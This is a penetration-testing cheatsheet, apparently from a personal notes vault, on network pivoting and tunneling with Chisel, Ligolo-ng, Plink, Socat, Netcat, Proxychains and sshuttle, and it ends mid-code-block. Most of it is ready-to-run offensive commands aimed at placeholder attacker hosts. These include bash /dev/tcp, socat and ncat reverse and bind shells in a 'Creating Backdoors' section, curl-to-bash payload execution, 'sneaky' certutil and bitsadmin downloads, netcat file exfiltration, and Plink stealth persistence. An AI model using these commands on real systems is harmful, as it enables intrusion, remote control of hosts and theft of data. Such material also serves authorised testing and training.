tunneling.md (36183B)
1 --- 2 title: "Tunneling" 3 description: "tunneling-tools/ ├── chisel/ # TCP/UDP tunnel over HTTP (Fast SOCKS proxy) ├── ligolo-ng/ # Advanced TUN-based tunneling (VPN-like, no SOCKS needed!) ├──…" 4 category: tunneling-pivoting 5 tags: ["tunneling-pivoting", "relay", "pivoting", "tunneling"] 6 tools: ["Nmap", "Impacket", "Metasploit", "Chisel", "Ligolo-ng"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Misc/Tunneling.md" 10 --- 11 # Tunneling Tools Cheatsheet 12 13 ## Quick Reference Table 14 15 | Tool | Best For | Requires Root | Stealthy | Multi-Platform | 16 |------|----------|---------------|----------|----------------| 17 | **Ligolo-ng** | Full network pivoting | Only on attacker | High | ✅ | 18 | **Chisel** | Quick SOCKS proxy | No | Medium | ✅ | 19 | **SSHuttle** | VPN-like tunneling | Yes (attacker) | High | Linux/Mac | 20 | **Plink** | Windows SSH tunneling | No | High | Windows only | 21 | **Socat** | Port forwarding/relays | No | High | Linux/Windows | 22 | **Netcat** | Simple port forwarding | No | Medium | ✅ | 23 | **Proxychains** | Route tools via proxy | No | N/A | Linux/Mac | 24 25 ## Installed Tools Location 26 ``` 27 tunneling-tools/ 28 ├── chisel/ # TCP/UDP tunnel over HTTP (Fast SOCKS proxy) 29 ├── ligolo-ng/ # Advanced TUN-based tunneling (VPN-like, no SOCKS needed!) 30 ├── plink/ # SSH client for Windows (PuTTY Link) 31 ├── socat/ # Multipurpose relay (Port forwarding, shell upgrades) 32 ├── nc/ # Netcat (ncat) - Classic networking swiss army knife 33 ├── proxychains/ # Route tools through SOCKS/HTTP proxies (Install via brew) 34 └── sshuttle/ # VPN over SSH (Install via brew) 35 ``` 36 37 --- 38 39 ## CHISEL 40 **Best for:** Quick SOCKS proxy setup, HTTP-based tunneling (bypasses restrictive firewalls) 41 42 ### Start Server (Attack Box) 43 ```bash 44 # macOS (Apple Silicon) 45 ./chisel/macos/chisel_darwin_arm64 server -p 8080 --reverse 46 47 # macOS (Intel) 48 ./chisel/macos/chisel_darwin_amd64 server -p 8080 --reverse 49 50 # Linux 51 ./chisel/linux/chisel_linux_amd64 server -p 8080 --reverse 52 53 # With authentication (recommended) 54 ./chisel server -p 8080 --reverse --auth user:password 55 56 # Verbose mode (see connections) 57 ./chisel server -p 8080 --reverse -v 58 ``` 59 60 ### Connect Client (Target) 61 ```bash 62 # Linux - Reverse SOCKS proxy 63 ./chisel_linux_amd64 client ATTACK_IP:8080 R:1080:socks 64 65 # Windows - Reverse SOCKS proxy 66 chisel_windows_amd64.exe client ATTACK_IP:8080 R:1080:socks 67 68 # With authentication 69 ./chisel client --auth user:password ATTACK_IP:8080 R:1080:socks 70 71 # Multiple port forwards 72 ./chisel client ATTACK_IP:8080 R:1080:socks R:8888:localhost:80 R:3389:10.10.10.5:3389 73 ``` 74 75 ### Common Chisel Patterns 76 ```bash 77 # Reverse SOCKS (most common - access target's network from attacker) 78 chisel client ATTACK_IP:8080 R:1080:socks 79 80 # Forward specific port (expose target's service on attacker) 81 chisel client ATTACK_IP:8080 R:8888:127.0.0.1:80 82 83 # Local SOCKS (less common - access attacker's network from target) 84 chisel client ATTACK_IP:8080 1080:socks 85 86 # Remote forward with specific bind address 87 chisel client ATTACK_IP:8080 R:0.0.0.0:9999:localhost:80 88 ``` 89 90 ### Usage with Proxychains 91 ```bash 92 # After establishing SOCKS proxy on port 1080 93 proxychains4 nmap -sT -Pn 10.10.10.0/24 94 proxychains4 curl http://internal-server 95 proxychains4 firefox # Browse internal web apps 96 ``` 97 98 --- 99 100 ## LIGOLO-NG 101 **Best for:** Full network pivoting without SOCKS, TUN-based (works like a VPN), automatic routing 102 103 ### Setup TUN Interface (Attack Box - One Time Setup) 104 105 #### Linux 106 ```bash 107 sudo ip tuntap add user $(whoami) mode tun ligolo 108 sudo ip link set ligolo up 109 ``` 110 111 #### macOS 112 ```bash 113 # Install tuntaposx if needed 114 brew install --cask tuntap 115 116 # Create interface (done automatically by ligolo-ng on macOS) 117 ``` 118 119 #### Windows 120 ```powershell 121 # Ligolo-ng handles TUN interface automatically on Windows 122 # Run as Administrator 123 ``` 124 125 ### Start Proxy (Attack Box) 126 ```bash 127 # Linux 128 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601 129 130 # macOS 131 ./ligolo-ng/macos/proxy -selfcert -laddr 0.0.0.0:11601 132 133 # With custom certificate 134 ./proxy -certfile server.crt -keyfile server.key -laddr 0.0.0.0:11601 135 136 # Enable autoroute (automatically adds routes - v0.8+) 137 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 138 139 # With Web UI (multiplayer mode - v0.8+) 140 ./proxy -selfcert -laddr 0.0.0.0:11601 -api 127.0.0.1:8080 141 ``` 142 143 ### Connect Agent (Target) 144 ```bash 145 # Linux 146 ./agent -connect ATTACK_IP:11601 -ignore-cert 147 148 # Windows 149 agent.exe -connect ATTACK_IP:11601 -ignore-cert 150 151 # With specific network interface 152 ./agent -connect ATTACK_IP:11601 -ignore-cert -bind 192.168.1.10 153 154 # Retry connection on failure 155 ./agent -connect ATTACK_IP:11601 -ignore-cert -retry 156 ``` 157 158 ### Ligolo Console Commands 159 ``` 160 # Session management 161 session # List all connected sessions 162 session <id> # Select a session 163 info # Show session info 164 165 # Network discovery 166 ifconfig # Show target's network interfaces 167 listener_list # Show active listeners 168 169 # Tunneling 170 start # Start the tunnel 171 stop # Stop the tunnel 172 173 # Port forwarding (reverse - opens port on target) 174 listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 175 listener_add --addr 10.10.10.5:80 --to 192.168.1.100:8080 176 listener_stop <id> # Stop a listener 177 178 # Remote agent control 179 agent_kill # Remotely terminate the agent 180 ``` 181 182 ### Add Routes (Attack Box) 183 184 #### Linux 185 ```bash 186 # Add route for internal network 187 sudo ip route add 10.10.10.0/24 dev ligolo 188 189 # Add multiple routes 190 sudo ip route add 172.16.0.0/16 dev ligolo 191 sudo ip route add 192.168.50.0/24 dev ligolo 192 193 # View routes 194 ip route | grep ligolo 195 ``` 196 197 #### macOS 198 ```bash 199 # Add route 200 sudo route add -net 10.10.10.0/24 -interface utun 201 # Note: utun interface number may vary (utun5, utun6, etc.) 202 # Check with: ifconfig | grep utun 203 204 # Delete route 205 sudo route delete 10.10.10.0/24 206 ``` 207 208 #### Windows 209 ```powershell 210 # Add route 211 route add 10.10.10.0 mask 255.255.255.0 10.0.0.1 212 213 # View routes 214 route print 215 ``` 216 217 ### Complete Workflow Example 218 ```bash 219 # 1. Start proxy on attacker 220 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 221 222 # 2. Run agent on compromised host 223 ./agent -connect ATTACKER_IP:11601 -ignore-cert 224 225 # 3. In ligolo console 226 ligolo-ng » session # See connected agent 227 ligolo-ng » session 1 # Select the agent 228 [Agent] ligolo-ng » ifconfig # View target networks 229 [Agent] ligolo-ng » start # Start tunnel 230 231 # 4. Add routes (if not using autoroute) 232 sudo ip route add 172.16.5.0/24 dev ligolo 233 234 # 5. Access internal network directly 235 nmap -sT -Pn 172.16.5.0/24 # No proxychains needed! 236 ssh user@172.16.5.10 237 curl http://172.16.5.50:8080 238 ``` 239 240 ### Double Pivoting (Pivot through multiple networks) 241 ```bash 242 # Network topology: Attacker -> Host1 -> Host2 -> Target Network 243 244 # 1. Setup pivot on Host1 245 ./agent -connect ATTACKER_IP:11601 -ignore-cert 246 247 # 2. From attacker, add route to Host1's network 248 sudo ip route add 192.168.100.0/24 dev ligolo 249 250 # 3. Setup listener on Host1 for Host2 to connect back 251 listener_add --addr 192.168.100.50:11601 --to ATTACKER_IP:11601 252 253 # 4. From Host2, connect through Host1 254 ./agent -connect 192.168.100.50:11601 -ignore-cert 255 256 # 5. Add route to Host2's network 257 sudo ip route add 10.20.30.0/24 dev ligolo 258 ``` 259 260 --- 261 262 ## PLINK (Windows SSH Client) 263 **Best for:** SSH tunneling from Windows targets (no installation needed, single executable) 264 265 ### Prerequisites 266 ```bash 267 # On attack box, enable SSH password authentication 268 sudo vim /etc/ssh/sshd_config 269 # Set: PasswordAuthentication yes 270 sudo systemctl restart sshd 271 272 # Create user for tunneling 273 sudo useradd -m tunneluser 274 sudo passwd tunneluser 275 ``` 276 277 ### Reverse SSH Tunnel (Expose target service on attacker) 278 ```cmd 279 # Expose target's localhost:80 on attacker's port 9999 280 plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 281 282 # Expose target's RDP to attacker 283 plink.exe -R 3389:127.0.0.1:3389 user@ATTACK_IP -pw password 284 285 # Expose internal network service 286 plink.exe -R 8080:10.10.10.50:80 user@ATTACK_IP -pw password 287 288 # Background execution (no window) 289 plink.exe -ssh -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 290 ``` 291 292 ### Dynamic SOCKS Proxy (Access target's network from attacker) 293 ```cmd 294 # Creates SOCKS proxy on attacker's port 1080 295 plink.exe -D 1080 user@ATTACK_IP -pw password 296 297 # Headless mode 298 plink.exe -N -D 1080 user@ATTACK_IP -pw password 299 ``` 300 301 ### Local Port Forward (Access attacker's service from target) 302 ```cmd 303 # Forward local 8080 to internal service 304 plink.exe -L 8080:INTERNAL_IP:80 user@ATTACK_IP -pw password 305 306 # Access attacker's tool on target 307 plink.exe -L 9001:ATTACK_IP:9001 user@ATTACK_IP -pw password 308 ``` 309 310 ### Persistence & Stealth 311 ```cmd 312 # Run in background (no console) 313 start /B plink.exe -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 314 315 # Auto-accept host key (first connection) 316 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 317 318 # Using SSH key instead of password 319 plink.exe -i private_key.ppk -R 9999:127.0.0.1:80 user@ATTACK_IP 320 ``` 321 322 --- 323 324 ## SOCAT 325 **Best for:** Port forwarding, shell upgrades, creating relays, encrypted tunnels 326 327 ### Basic Port Forwarding 328 ```bash 329 # Forward local 8080 to remote host (TCP) 330 ./socat_linux_x64 TCP-LISTEN:8080,fork TCP:TARGET_IP:80 331 332 # UDP port forward 333 ./socat_linux_x64 UDP-LISTEN:53,fork UDP:DNS_SERVER:53 334 335 # Bind to specific interface 336 ./socat_linux_x64 TCP-LISTEN:8080,bind=192.168.1.10,fork TCP:TARGET_IP:80 337 338 # IPv6 forwarding 339 socat TCP6-LISTEN:8080,fork TCP6:[fe80::1]:80 340 ``` 341 342 ### Reverse Shell Relay (Pivot through host) 343 ```bash 344 # On pivot host - relay connections to attacker 345 ./socat_linux_x64 TCP-LISTEN:4444,fork TCP:ATTACK_IP:4444 346 347 # Victim connects to pivot 348 bash -i >& /dev/tcp/PIVOT_IP/4444 0>&1 349 350 # Attacker receives shell 351 nc -lvnp 4444 352 ``` 353 354 ### TTY Shell Upgrade (Fully Interactive Shell) 355 ```bash 356 # Step 1: Attacker - prepare listener 357 socat file:`tty`,raw,echo=0 TCP-LISTEN:4444 358 359 # Step 2: Target - connect with PTY 360 ./socat_linux_x64 exec:'bash -li',pty,stderr,setsid,sigint,sane TCP:ATTACK_IP:4444 361 362 # Result: Full TTY with job control, tab completion, clear screen, etc. 363 ``` 364 365 ### Encrypted Tunnels (OpenSSL) 366 ```bash 367 # Generate certificate 368 openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 365 -out bind.crt 369 cat bind.key bind.crt > bind.pem 370 371 # Listener (encrypted) 372 socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash 373 374 # Client (connect) 375 socat - OPENSSL:TARGET_IP:4443,verify=0 376 ``` 377 378 ### File Transfers 379 ```bash 380 # Sender 381 socat TCP-LISTEN:9999,reuseaddr FILE:file.zip 382 383 # Receiver 384 socat TCP:SENDER_IP:9999 CREATE:received.zip 385 ``` 386 387 ### Port Scanning with Socat 388 ```bash 389 # Simple port check 390 socat - TCP:TARGET:80,connect-timeout=1 391 392 # Banner grabbing 393 echo "" | socat - TCP:TARGET:22,connect-timeout=1 394 ``` 395 396 ### Creating Reverse Shells 397 ```bash 398 # Bind shell (target) 399 socat TCP-LISTEN:5555,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane 400 401 # Reverse shell (target to attacker) 402 socat EXEC:/bin/bash TCP:ATTACK_IP:4444 403 404 # Windows reverse shell 405 socat TCP:ATTACK_IP:4444 EXEC:'cmd.exe',pipes 406 ``` 407 408 --- 409 410 ## NETCAT (NCAT) 411 **Best for:** Quick port forwarding, simple relays, port scanning, basic file transfers 412 413 ### Basic Port Forwarding 414 ```bash 415 # Simple TCP relay (pivot) 416 mkfifo /tmp/f; cat /tmp/f | nc TARGET_IP 80 | nc -l -p 8080 > /tmp/f 417 418 # Persistent relay (using while loop) 419 while true; do nc -l -p 8080 -c "nc TARGET_IP 80"; done 420 ``` 421 422 ### Reverse Shell Relay 423 ```bash 424 # On pivot host - relay to attacker 425 mkfifo /tmp/f; nc ATTACK_IP 4444 < /tmp/f | nc -l -p 9999 > /tmp/f 426 427 # Victim connects to pivot:9999 428 # Attacker gets shell on 4444 429 ``` 430 431 ### File Transfers 432 ```bash 433 # Receiver (start first) 434 ./ncat_linux_x64 -l -p 9999 > received_file.zip 435 436 # Sender 437 ./ncat_linux_x64 TARGET_IP 9999 < file.zip 438 439 # With progress (using pv) 440 pv file.zip | nc TARGET_IP 9999 441 ``` 442 443 ### Port Scanning 444 ```bash 445 # Check single port 446 nc -zv TARGET_IP 80 447 448 # Scan range 449 nc -zv TARGET_IP 20-25 450 451 # Banner grabbing 452 echo "" | nc -v -n -w1 TARGET_IP 22 453 ``` 454 455 ### Creating Backdoors 456 ```bash 457 # Bind shell (target) 458 ./ncat_linux_x64 -l -p 5555 -e /bin/bash 459 460 # Reverse shell (target to attacker) 461 ./ncat_linux_x64 ATTACK_IP 4444 -e /bin/bash 462 463 # Windows reverse shell 464 ncat.exe ATTACK_IP 4444 -e cmd.exe 465 ``` 466 467 ### Chat/Communication Channel 468 ```bash 469 # Listener 470 nc -l -p 4444 471 472 # Client 473 nc TARGET_IP 4444 474 # Type messages, they appear on both sides 475 ``` 476 477 --- 478 479 ## PROXYCHAINS (Install Required) 480 **Best for:** Routing any tool through SOCKS/HTTP proxies (pairs well with Chisel/SSH) 481 482 ### Installation 483 ```bash 484 # macOS 485 brew install proxychains-ng 486 487 # Kali Linux / Debian / Ubuntu 488 sudo apt install proxychains4 -y 489 490 # Arch Linux 491 sudo pacman -S proxychains-ng 492 ``` 493 494 ### Config File Locations 495 ``` 496 # macOS (Homebrew) 497 /opt/homebrew/etc/proxychains.conf # Apple Silicon 498 /usr/local/etc/proxychains.conf # Intel Mac 499 500 # Linux 501 /etc/proxychains.conf # System-wide (older version) 502 /etc/proxychains4.conf # proxychains-ng (newer) 503 ~/.proxychains/proxychains.conf # User config (highest priority) 504 505 # Kali Linux 506 /etc/proxychains4.conf 507 ``` 508 509 ### Configuration Examples 510 ```bash 511 # Edit config file 512 sudo nano /etc/proxychains4.conf 513 514 # Basic SOCKS5 proxy (Chisel default) 515 [ProxyList] 516 socks5 127.0.0.1 1080 517 518 # SOCKS4 proxy 519 socks4 127.0.0.1 1080 520 521 # HTTP proxy 522 http 127.0.0.1 8080 523 524 # Chain multiple proxies 525 socks5 127.0.0.1 1080 526 socks5 10.10.10.5 1081 527 http 172.16.0.1 3128 528 529 # Proxy with authentication 530 socks5 127.0.0.1 1080 username password 531 ``` 532 533 ### Proxy Modes (in config file) 534 ```bash 535 # Dynamic chain (dead proxies auto-skipped) 536 dynamic_chain 537 538 # Strict chain (all proxies must work) 539 strict_chain 540 541 # Random chain (randomize proxy order) 542 random_chain 543 # random_chain = 2 # Use 2 random proxies from list 544 ``` 545 546 ### Common Usage 547 ```bash 548 # Nmap through proxy (use -sT for TCP connect scan) 549 proxychains4 nmap -sT -Pn 10.10.10.0/24 550 551 # SSH to internal host 552 proxychains4 ssh user@internal_host 553 554 # Web requests 555 proxychains4 curl http://internal-web 556 proxychains4 wget http://internal-site/file.zip 557 558 # Firefox browser (browse internal web apps) 559 proxychains4 firefox 560 561 # RDP through proxy 562 proxychains4 xfreerdp /v:10.10.10.5 /u:admin 563 564 # Metasploit through proxy 565 proxychains4 msfconsole 566 ``` 567 568 ### Quiet Mode (Suppress Proxychains Output) 569 ```bash 570 # Add to config file 571 quiet_mode 572 573 # Or use -q flag 574 proxychains4 -q nmap -sT 10.10.10.0/24 575 ``` 576 577 ### Custom Config File 578 ```bash 579 # Use specific config 580 proxychains4 -f /path/to/custom.conf curl http://target 581 582 # Example custom config 583 cat << EOF > /tmp/proxy.conf 584 strict_chain 585 quiet_mode 586 [ProxyList] 587 socks5 127.0.0.1 1080 588 EOF 589 590 proxychains4 -f /tmp/proxy.conf nmap -sT 10.10.10.5 591 ``` 592 593 ### DNS Configuration 594 ```bash 595 # In config file: 596 proxy_dns # Route DNS through proxy (default, recommended) 597 598 # Or disable: 599 #proxy_dns # Local DNS resolution 600 ``` 601 602 ### Troubleshooting 603 ```bash 604 # Test proxy connection 605 proxychains4 curl -I http://google.com 606 607 # Verbose mode (see all proxy operations) 608 # Comment out quiet_mode in config 609 610 # If "ERROR: ld.so: object 'libproxychains.so.3'" appears: 611 # Update config with correct lib path or reinstall proxychains 612 ``` 613 614 --- 615 616 ## SSHUTTLE (Install Required) 617 **Best for:** VPN-like tunneling over SSH (transparent proxying, no SOCKS needed!) 618 619 ### Installation 620 ```bash 621 # macOS 622 brew install sshuttle 623 624 # Kali Linux / Debian / Ubuntu 625 sudo apt install sshuttle -y 626 627 # Arch Linux 628 sudo pacman -S sshuttle 629 630 # Python pip 631 pip3 install sshuttle 632 ``` 633 634 ### Basic Usage 635 ```bash 636 # Route all private networks through pivot 637 sshuttle -r user@PIVOT_HOST 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 638 639 # Route specific subnet 640 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 641 642 # Multiple subnets 643 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 192.168.1.0/24 644 645 # Route everything (0/0) - careful! 646 sshuttle -r user@PIVOT_HOST 0/0 647 ``` 648 649 ### Advanced Options 650 ```bash 651 # Exclude specific hosts/networks 652 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -x PIVOT_HOST -x 10.10.10.50 653 654 # Use SSH key 655 sshuttle -r user@PIVOT_HOST -e 'ssh -i /path/to/key' 10.10.10.0/24 656 657 # Specify SSH port 658 sshuttle -r user@PIVOT_HOST:2222 10.10.10.0/24 659 660 # Verbose mode (see connections) 661 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -vv 662 663 # DNS through tunnel 664 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns 665 666 # Auto detect and route all remote subnets 667 sshuttle -r user@PIVOT_HOST --auto-nets 668 669 # Exclude local DNS 670 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns --to-ns=8.8.8.8 671 ``` 672 673 ### Daemon Mode (Background) 674 ```bash 675 # Run in background 676 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -D 677 678 # View sshuttle processes 679 ps aux | grep sshuttle 680 681 # Kill sshuttle 682 pkill sshuttle 683 ``` 684 685 ### Using Jump Hosts 686 ```bash 687 # SSH through jump host 688 sshuttle -r user@FINAL_HOST -e 'ssh -J user@JUMP_HOST' 10.10.10.0/24 689 690 # Multiple hops 691 sshuttle -r user@HOST3 -e 'ssh -J user@HOST1,user@HOST2' 10.10.10.0/24 692 ``` 693 694 ### Common Scenarios 695 ```bash 696 # Lab/CTF environment 697 sshuttle -r user@jump.lab.local 10.0.0.0/8 --dns -vv 698 699 # Pentest engagement (exclude your C2 server) 700 sshuttle -r user@pivot 10.10.0.0/16 -x YOUR_C2_IP 701 702 # Access cloud internal networks 703 sshuttle -r ubuntu@bastion.aws.com 10.0.0.0/16 172.31.0.0/16 704 705 # Through compromised host with SSH 706 sshuttle -r root@compromised-host 192.168.100.0/24 --no-latency-control 707 ``` 708 709 ### Troubleshooting 710 ```bash 711 # Check firewall rules added by sshuttle 712 sudo iptables -L -t nat # Linux 713 sudo pfctl -s all # macOS 714 715 # If connection drops 716 sshuttle -r user@HOST 10.10.10.0/24 --no-latency-control 717 718 # Manually clean up if sshuttle crashes 719 sudo pkill sshuttle 720 sudo iptables -t nat -F # Linux 721 sudo pfctl -F all # macOS 722 723 # Test connectivity 724 ping 10.10.10.5 # After sshuttle is running 725 curl http://10.10.10.50:80 726 ``` 727 728 ### Comparison with Other Tools 729 ``` 730 SSHuttle vs Ligolo-ng: 731 + Simpler (just needs SSH) 732 + No agent/binary on target 733 - Requires SSH access 734 - Slightly slower 735 736 SSHuttle vs Proxychains + Chisel: 737 + Transparent (no proxychains needed) 738 + Better performance 739 + Simpler to use 740 - Requires SSH 741 ``` 742 743 --- 744 745 ## Quick Transfer Commands 746 747 ### Start HTTP Server (Attacker) 748 ```bash 749 # Python3 (default) 750 python3 -m http.server 8000 751 752 # Python3 on specific interface 753 python3 -m http.server 8000 --bind 192.168.1.10 754 755 # Python2 756 python -m SimpleHTTPServer 8000 757 758 # PHP 759 php -S 0.0.0.0:8000 760 761 # Ruby 762 ruby -run -e httpd . -p 8000 763 764 # With authentication 765 python3 -m http.server 8000 --directory /path/to/files 766 ``` 767 768 ### Download on Target 769 770 #### Linux 771 ```bash 772 # wget 773 wget http://ATTACK_IP:8000/chisel_linux_amd64 -O /tmp/chisel && chmod +x /tmp/chisel 774 775 # curl 776 curl http://ATTACK_IP:8000/chisel_linux_amd64 -o /tmp/chisel && chmod +x /tmp/chisel 777 778 # curl with progress bar 779 curl -# http://ATTACK_IP:8000/file.zip -o /tmp/file.zip 780 781 # Download and execute in memory (be careful!) 782 curl http://ATTACK_IP:8000/script.sh | bash 783 784 # Using /dev/tcp if no tools available 785 cat < /dev/tcp/ATTACK_IP/8000 > /tmp/file 786 ``` 787 788 #### Windows PowerShell 789 ```powershell 790 # Invoke-WebRequest (PowerShell 3.0+) 791 Invoke-WebRequest -Uri http://ATTACK_IP:8000/chisel.exe -OutFile C:\Windows\Temp\chisel.exe 792 793 # Short alias 794 iwr -uri http://ATTACK_IP:8000/file.zip -o C:\Temp\file.zip 795 796 # WebClient (older PowerShell) 797 (New-Object System.Net.WebClient).DownloadFile("http://ATTACK_IP:8000/chisel.exe", "C:\Temp\chisel.exe") 798 799 # certutil (sneaky, no PowerShell) 800 certutil -urlcache -f http://ATTACK_IP:8000/chisel.exe C:\Temp\chisel.exe 801 802 # bitsadmin 803 bitsadmin /transfer myDownload /download /priority high http://ATTACK_IP:8000/file.exe C:\Temp\file.exe 804 ``` 805 806 #### Windows CMD 807 ```cmd 808 # PowerShell one-liner from CMD 809 powershell -c "Invoke-WebRequest -Uri 'http://ATTACK_IP:8000/file.exe' -OutFile 'C:\Temp\file.exe'" 810 811 # certutil 812 certutil.exe -urlcache -split -f http://ATTACK_IP:8000/file.exe C:\Temp\file.exe 813 ``` 814 815 ### Upload from Target to Attacker 816 817 #### Using Netcat 818 ```bash 819 # Attacker (receiver) 820 nc -lvnp 9999 > received_file.zip 821 822 # Target (sender) 823 cat file.zip | nc ATTACK_IP 9999 824 ``` 825 826 #### Using curl (POST) 827 ```bash 828 # Attacker (receiver with python) 829 python3 -m uploadserver 8000 830 831 # Target (sender) 832 curl -X POST http://ATTACK_IP:8000/upload -F 'files=@/path/to/file.zip' 833 ``` 834 835 ### SMB Transfer (Windows) 836 837 #### Setup SMB Server (Attacker - Linux) 838 ```bash 839 # Using impacket 840 impacket-smbserver share /path/to/share -smb2support 841 842 # With authentication 843 impacket-smbserver share /path/to/share -smb2support -username user -password pass 844 ``` 845 846 #### Access SMB Share (Target - Windows) 847 ```cmd 848 # List share 849 net view \\ATTACK_IP 850 851 # Copy from share 852 copy \\ATTACK_IP\share\chisel.exe C:\Temp\ 853 854 # Execute from share (no copy) 855 \\ATTACK_IP\share\chisel.exe 856 857 # Mount share 858 net use Z: \\ATTACK_IP\share 859 net use Z: \\ATTACK_IP\share /user:user pass 860 ``` 861 862 ### Base64 Transfer (Small Files) 863 ```bash 864 # Encode on attacker 865 base64 -w0 chisel > chisel.b64 866 867 # Decode on target (Linux) 868 echo "BASE64_STRING" | base64 -d > chisel && chmod +x chisel 869 870 # Decode on target (Windows PowerShell) 871 [System.Convert]::FromBase64String("BASE64_STRING") | Set-Content -Path chisel.exe -Encoding Byte 872 ``` 873 874 --- 875 876 ## Common Pentesting Scenarios 877 878 ### Scenario 1: Access Internal Network from Compromised DMZ Host 879 880 **Situation:** You compromised a Linux web server in DMZ (10.50.50.5), need to access internal network (192.168.10.0/24) 881 882 **Solution 1: Ligolo-ng (Best - No SOCKS needed)** 883 ```bash 884 # On attacker 885 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 886 887 # On compromised DMZ host 888 ./agent -connect ATTACKER_IP:11601 -ignore-cert 889 890 # In ligolo console 891 session 1 892 start 893 894 # Add route (if autoroute not used) 895 sudo ip route add 192.168.10.0/24 dev ligolo 896 897 # Access internal network directly 898 nmap -sT 192.168.10.0/24 899 ``` 900 901 **Solution 2: Chisel + Proxychains (Fast to setup)** 902 ```bash 903 # On attacker 904 ./chisel server -p 8080 --reverse 905 906 # On DMZ host 907 ./chisel client ATTACKER_IP:8080 R:1080:socks 908 909 # On attacker 910 proxychains4 nmap -sT 192.168.10.5 911 ``` 912 913 ### Scenario 2: Windows Target with No Direct Outbound Access 914 915 **Situation:** Windows box can only reach another compromised Linux host (pivot), can't reach attacker directly 916 917 **Solution: Double Pivot with Chisel** 918 ```bash 919 # Step 1: Setup Chisel on first pivot (Linux) 920 ./chisel server -p 8080 --reverse 921 922 # Step 2: Windows connects to Linux pivot 923 chisel.exe client LINUX_PIVOT_IP:8080 R:1080:socks 924 925 # Step 3: On attacker, create another tunnel to reach Windows network via Linux pivot 926 ssh -L 9999:localhost:1080 user@LINUX_PIVOT_IP 927 928 # Step 4: Configure proxychains to use localhost:9999 929 # Then access Windows internal network 930 proxychains4 rdesktop INTERNAL_WINDOWS_IP 931 ``` 932 933 ### Scenario 3: Expose Internal Service to Attacker 934 935 **Situation:** Internal MSSQL server at 172.16.5.10:1433, want to connect from attacker 936 937 **Solution 1: Chisel Reverse Port Forward** 938 ```bash 939 # On attacker 940 ./chisel server -p 8080 --reverse 941 942 # On compromised internal host 943 ./chisel client ATTACKER_IP:8080 R:1433:172.16.5.10:1433 944 945 # On attacker, connect directly 946 mssqlclient.py sa:password@127.0.0.1:1433 947 ``` 948 949 **Solution 2: SSH Reverse Tunnel (if SSH available)** 950 ```bash 951 # From compromised host 952 ssh -R 1433:172.16.5.10:1433 user@ATTACKER_IP 953 954 # On attacker 955 mssqlclient.py sa:password@127.0.0.1:1433 956 ``` 957 958 ### Scenario 4: Port Forward Through Windows (No Custom Tools) 959 960 **Situation:** Compromised Windows server, need tunnel but can't upload tools 961 962 **Solution: Built-in Windows Port Forward (netsh)** 963 ```cmd 964 # Forward local port 8080 to internal service 965 netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.10.50 966 967 # View forwards 968 netsh interface portproxy show all 969 970 # Delete forward 971 netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 972 ``` 973 974 ### Scenario 5: Multiple Nested Networks (3+ Hops) 975 976 **Situation:** Attacker -> Host A (10.10.10.5) -> Host B (192.168.1.10) -> Target Network (172.16.0.0/24) 977 978 **Solution: Ligolo-ng Listener Chaining** 979 ```bash 980 # Step 1: Connect Agent A to attacker 981 # On attacker 982 ./proxy -selfcert -laddr 0.0.0.0:11601 983 984 # On Host A 985 ./agent -connect ATTACKER_IP:11601 -ignore-cert 986 987 # Step 2: In ligolo console, create listener on Host A for Host B 988 session 1 989 listener_add --addr 0.0.0.0:11601 --to ATTACKER_IP:11601 990 start 991 992 # Step 3: Add route to Host A network 993 sudo ip route add 192.168.1.0/24 dev ligolo 994 995 # Step 4: From Host B, connect through Host A 996 ./agent -connect 192.168.1.10:11601 -ignore-cert 997 998 # Step 5: Select Host B session and add route 999 session 2 1000 start 1001 sudo ip route add 172.16.0.0/24 dev ligolo 1002 1003 # Access final target network 1004 nmap 172.16.0.5 1005 ``` 1006 1007 ### Scenario 6: Catch Reverse Shell Through Tunnel 1008 1009 **Situation:** Need to catch a reverse shell from internal network host (no direct route) 1010 1011 **Solution: Ligolo-ng Listener (Reverse Port Forward)** 1012 ```bash 1013 # Setup tunnel to internal network (as usual) 1014 ./proxy -selfcert -laddr 0.0.0.0:11601 1015 ./agent -connect ATTACKER_IP:11601 -ignore-cert 1016 1017 # In ligolo console, setup listener 1018 session 1 1019 listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 1020 start 1021 1022 # On attacker, setup nc listener 1023 nc -lvnp 4444 1024 1025 # On target internal host, execute reverse shell to agent's IP 1026 bash -i >& /dev/tcp/AGENT_IP/4444 0>&1 1027 1028 # Shell appears on attacker's nc listener! 1029 ``` 1030 1031 ### Scenario 7: Access Internal Web Application 1032 1033 **Situation:** Internal web app at http://intranet.local (192.168.5.50:80), want to browse from attacker 1034 1035 **Solution 1: Ligolo-ng (Direct Access)** 1036 ```bash 1037 # Setup tunnel 1038 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 1039 ./agent -connect ATTACKER_IP:11601 -ignore-cert 1040 1041 # Start tunnel 1042 session 1; start 1043 1044 # Add to /etc/hosts 1045 echo "192.168.5.50 intranet.local" | sudo tee -a /etc/hosts 1046 1047 # Browse directly 1048 firefox http://intranet.local 1049 ``` 1050 1051 **Solution 2: Chisel + Browser SOCKS Proxy** 1052 ```bash 1053 # 